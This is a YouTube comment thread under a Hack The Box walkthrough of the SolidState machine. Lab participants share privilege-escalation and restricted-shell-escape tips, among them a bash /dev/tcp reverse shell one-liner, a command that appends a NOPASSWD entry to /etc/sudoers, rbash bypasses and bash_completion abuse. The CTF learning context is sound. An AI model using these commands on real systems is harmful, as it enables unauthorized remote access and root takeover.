So glad I watch your videos after rooting! I spent far too long getting a reverse shell to work from the .py script - the dash trick was very cool and something I've made a note of for future reference!
@codebx5 жыл бұрын
I'm sure you already found this out since this was almost a year ago, but you should be able to install 'gcc-multilib' on your host (kali) instance, and then you can compile your C code with the '-m32' gcc flag, which will compile your binary as a 32-bit binary. That way you won't need a 32-bit machine lying around. Another quick tip is that sometimes you'll have glibc version incompatibilities, and you can use the gcc flag '-D_GNU_SOURCE', which should use more portable versions of glibc that will likely be compatible with the victim machine you're running the code on.
@lumenknotty6355 Жыл бұрын
Fuck this saved my life for haircut in 2023. I could not understand why it wasn't working. Thank you.
@magnoliacomputerscience73346 жыл бұрын
Probably my favorite box sad they retired it :/ Love the vid, glad you can pass your knowledge down to the unlearned like me!
@slythx52313 жыл бұрын
18:21 the reverse shell didn't work because the "/bin/bash -c" is missing .It should be os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1' ")
@onlyastron4ut3 жыл бұрын
This box was a lot of fun and was indeed fairly straightforward, my main problem was getting a stable shell as mindy as I didn't escape rbash like you did. Nonetheless I rooted this box fairly quick so that's a good thing!
@Nilaats6 жыл бұрын
I was working this box while you were recording the /bulb in the ssh login script was me lol
@desktopt3284 жыл бұрын
Thanks for the great walk through as usual ! I have one question thou. I'am not a Linux expert bur is any exploit you add to /etc/bash_completion.d will be executed once a user logs in ? or this is just specific to James exploit ? I remember reading that you can get a shell using bashrc or bash_auto-completion (not sure) if you can write files to Linux using FTP or any service that would allow you put files on the system. 26:10
@nmkkannan12564 жыл бұрын
How can we know /bin/dash can be checked? or is it a generic checklist based approach ?
@berndeckenfels4 жыл бұрын
Is the James exploit which is waiting for a James login supposed to get a James login by the box. Or can the file be dropped for something like user crontab or similar?
@_Skunkfoot_6 жыл бұрын
Interesting. When you get the exploit to run, you get a shell, but it's still the mindy user right? I actually found some python code to connect back to my box and put that in the /opt/tmp.py. Then, in order to get a root shell, I used the james exploit to run /opt/tmp.py whenever someone logged in. This way, I got a reverse shell as root. Not saying this way is better, it's probably a lot of unnecessary work. I like seeing different ways to priv esc, I've never seen that dash method before!
@willframpton59555 жыл бұрын
Nc didn’t return the shell because you specified 15-24 in your IPaddress - not 14-23 17:10
@CameronNoakes3 жыл бұрын
i noticed this as well - we are on the ball!
@HK-sw3vi3 жыл бұрын
that part made me anxious
@VoidBiscuit2 жыл бұрын
@@HK-sw3vi same lol
@space_venture7825 жыл бұрын
i cannot scan nmap or ping machine and some one work fine and other don't in hack the box (all the configuration is super i followed every steps why is that happening)
@susnoname2 жыл бұрын
At 20:09 IppSec said that script runs every 3 minutes. Maybe I missed something, but where did he see that information?
@GeekyGizmo0074 жыл бұрын
Why in the world would 6 people downvote this...
@brandonevans51232 жыл бұрын
Thanks for the video! I think there might be another privesc method I couldn't find any discussion on using CVE-2017-18190, since you can set up an ssh tunnel on port 631 to access the administration panel of CUPS 2.2.1. I might play around with it later and see but if anyone else has tried this I would like to know!
@Lipo554 жыл бұрын
Hi, Ippsec, I don’t understand as the “/opt/tmp.py” was executed without being at cron job in 21:48. Can you tell me, please? Tks!
@aharonmo41884 жыл бұрын
I also didn't understand that! how did you realize that the cron will execute every 3 min?
@TheFunLee3 жыл бұрын
Just completed Solidstate yesterday and just watched this video. But I did tried to use bash or /bin/bash for rbash-escaping, it didn’t work for me. Seems bash is not in mindy’s bin...
@raycharles62403 жыл бұрын
I faced the same issue as well.
@CurrentlyObsessively4 жыл бұрын
4:26 ...I have done so much tr and sed for no reason... THERE'S A GNMAP OUTPUT?!?!? grep-able nmap format sounds so nice
@raulcpop5 жыл бұрын
I am doing this machine once again. You have gaps between ssh mindy and rbash escape you used before the James exploit. and thats why you could escape it with "bash" command.
@mikewollmann2 жыл бұрын
22:00 shouldn't write to sudoes be enough? like: os.system( '/bin/echo "mindy ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers') sudo su - and ur root *shrug*
@blevenzon6 жыл бұрын
Curious what keyboard are you using?
@ippsec6 жыл бұрын
Ducky Zero
@blevenzon6 жыл бұрын
IppSec thank you, it sounds fantastic lol
@rhausk5 жыл бұрын
lol @ 7:37. Did you win Netwars?
@TimmyTSENGKaliOSCPpentest3 жыл бұрын
Is it can use evolution for see the email?
@MrGentlemanism2 жыл бұрын
Couldn't connect to the mail server using thunderbird..
@nobodysroom3135 Жыл бұрын
The suid of /bin/dash is not s now for this box ,so I can't use it for privilege escalation. I think htb should changed this in last month, that's really weird. Why didn't they just keep it.
@8urnside6 жыл бұрын
thanks for another great video. So this py file is run every 3 mins. Nothing showed in the cron jobs, so aside from being curious as to what the file does due to the permissions, is there any way to identify files that are actioned by the system? thanks
@FelixPeters141884 жыл бұрын
I found it by using pspy (github.com/DominicBreuker/pspy) and watch the process list
@mzynehtb79012 жыл бұрын
@@FelixPeters14188 thanks a lot. I was struggling to find this information.
@user-gi2sb8xr8f6 жыл бұрын
Wow i wish i was good at regex. More practice needed i guess.
@matthewrice75905 жыл бұрын
So how is it that you are able to serve a file from port 80 without having to configure port forwarding on your router?
@tejaszarekar91455 жыл бұрын
there is no need for port forwarding on router... This is happening inside HTB VPN
@matthewrice75905 жыл бұрын
tejas zarekar ah, of course...that makes sense. Thanks for the reply.
@howto...62984 жыл бұрын
Hey ippsec can you help me... Everytime i scan a machine from nmap it says "host seems down"... I don't know why
@wutangdaug4 жыл бұрын
first, you will need to login to the VPN. Second of all, you need to make sure the machine is online. You can see the status of the machine from dashboard. If you want to working on a retired machine, you will need VIP access my friend.
@nickm.53286 жыл бұрын
no james escalation :/ still great vid!
@VoidBiscuit2 жыл бұрын
"the path of least resistance" 😂
@kaungkhantnyinyi95794 жыл бұрын
bash doesn't work on my mindy shell x(
@MichaelImo4 жыл бұрын
same... i'm thinking they may have made changes to the box since this video has come out.
@crn28154 жыл бұрын
@@MichaelImo Since box is retired... Use the james exploit to copy "/bin/bash" over to /home/mindy/bin. Since we know mindy's PATH is "/home/mindy/bin" we can run "bash" without any /'s. Maybe it had already been done and ippsec didn't notice, but I just tried out the box and that's the method I used!
@rolfvreijdenberger16393 жыл бұрын
`BASH_CMDS[lala]=/bin/bash;lala;` will allow you to escape a restricted shell on older rbash versions
@TheLinuxOS6 жыл бұрын
amazing video (y) can u tell which screen recorder you are using ?
@ippsec6 жыл бұрын
Obs.
@izaak7915 жыл бұрын
Thanks Ippsec for the always awesome tuts! I modified the command at 5:08-5:510 to make life easier for myself and anyone that may need this as follows grep -oP '\d{1,5}/tcp' NmapOutput.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//' We could probably use it with back tick in a script to have it all in 1 line nmap -p- --open 10.10.10.120 -T4 -oA NmapOutput3 && Portlist=`grep -oP '\d{1,5}/tcp' NmapOutput3.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//'` && echo "value is:$Portlist" && nmap --script vuln -p$Portlist 10.10.10.120
@marcobrandoni84336 жыл бұрын
Hello everybody, at min 10.33 Ippsec types bash to escape the rbash. This trick doesn't work for me. Is anybody having the same issue? How did you guys bypass it? Thank you for your time/help
@marcobrandoni84336 жыл бұрын
after trying harder I found this amazing link that solved the issue. I hope this will help someone else too :) speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
@snydher5 жыл бұрын
@@marcobrandoni8433 Thanks buddy, still learning a lot ;)
@jlinscott51745 жыл бұрын
That "bash --noprofile" did the trick! Thanks!
@zp3005 жыл бұрын
@@jlinscott5174 it should NOT work, he didn't reset the machine prior to working on it the way to escape that is just "ssh mindy@10.10.10.51 bash" and you're good.
@theodosistarlas73006 жыл бұрын
well im kinda new to hacking and not so good i have watched 4-5 of your videos and im curius on how you learned that much and if its possible for a 17 years old like me to become a fantastic inspiration man like u in hacking i want to ask from where should i start what is the most useful knowledge cause i try for 1-2 weaks to take my first machine down and i suck i start feeling shitty i would like to hear some help from where to start or any tips to become better and understand the theory behind all this just 1 more question can i try this machines when they become retired somewhere else ? just to understand it cause i cant own machine or user :( so at least i want to practise
@desktopt3284 жыл бұрын
20:26 The script didn't catch the cron process apparently because the delay interval is so long that the cron starts and finishes before the script can detect it. I set the sleep period to .01 and it caught it ! Simple yet very effective script. You used another script that does this automatically but in a more professional way but I can't recall the script name :( And thannnnks dude :D
@ippsec4 жыл бұрын
Probably PSPY
@desktopt3284 жыл бұрын
@@ippsec Yes it is. Thanks :D
@fairchild9able5 жыл бұрын
Good work Ipp. For anyone following along and not getting it make sure to log in with " ?????@10.10.10.51 -t bash --noprofile"
@paired78155 жыл бұрын
thanks man
@wheeler904 жыл бұрын
thanks needed that little push
@ShabazDraee4 жыл бұрын
hats off mate, well done!
@bugr33d0_hunter85 жыл бұрын
Haha, he said Nine vah. I thought it was where Jesus was from, Nineveh, or around d there. I wonder if they secretly had internet then. Feels like just the other day. 👨💻
@fyodordostoevsky59016 жыл бұрын
Small inaccuracy escaping rbash, it's only because the exploit ran by another user, if it was a clean run you would have had to pop a rev she'll from a James exploit or at least run it yourself in order to bypass it with ctrlc.
@ippsec6 жыл бұрын
Yeah -- Unfortunately didn't notice another user was on the box until it was too late. I believe I explain it near the very end of the video after i manually cleared out the bash completion junk.
@fyodordostoevsky59016 жыл бұрын
IppSec, word, as always great videos. I didn't watch the whole thing sorry if you already knew m8 I mostly wanted to clarify that to people saying other methods work such as noprofile.
@TsukiCTF5 жыл бұрын
have you tried using these too? -> ssh mindy@10.10.10.51 -t "/bin/sh" or ssh mindy@10.10.10.51 -t "bash --noprofile" # (two - before noprofile; youtube renders them like - on my screen if not looking close)
@GuiltySpark5 жыл бұрын
@@TsukiCTF " ssh mindy@10.10.10.51 -t "bash --noprofile" worked for me I'll have to member this trick in the future
@marcuswysocki49674 жыл бұрын
is there a list or database for all the additions you put on your nmap (for ex. -sC, -sV)? thanks!
@adogonz4424 жыл бұрын
search 'man nmap' on google
@berndeckenfels4 жыл бұрын
I think 2>&1 in your reverse shell will take care of the errors landing in the host session and should better detach from the user term
@shakirali36476 жыл бұрын
Hey Your simple nc reverse shell wasn't working because you entered the wrong ip in the first try
@_Skunkfoot_6 жыл бұрын
True, but it wouldn't have given him a root shell anyway since he ran it as mindy
@ippsec6 жыл бұрын
As far as I remember, the /opt/tmp.py gets executed as root via a cron every 3 minutes. If i didn't typo, it should of worked.
@_Skunkfoot_6 жыл бұрын
You're probably right, that's probably the way we're supposed to do it tbh. Probably something I didn't notice or overlooked. But I'm pretty sure if you try to python tmp.py, it will run as mindy and give you a shell with mindy's permissions iirc.
@mingzhangwang64596 жыл бұрын
I tried to python tmp.py as mindy and it gave me a restricted shell.
@kab38004 жыл бұрын
@@ippsec i can confirm that it works. if your vi is being weird like in my case, the backspace wasn't working and luckily it had nano, so i modified the tmp.py by the ippsec's earlier payload, waited and w00t! Thanks o much Ippsec!! i also followed the 'dash' and 'james' exploit!! You are too good!!!!!
@tornikebarisovi39895 жыл бұрын
after root python script much simpler open user.txt and root.txt with py script and write it to txt file
@cocosloan37484 жыл бұрын
This comments OMG... You all so smart but i doubt you can do 5% of what he's doing!
@romilthakkar404 Жыл бұрын
I got debian_chroot from (ssh username@IP -t "bash --noprofile"). Not from typing bash in mindy.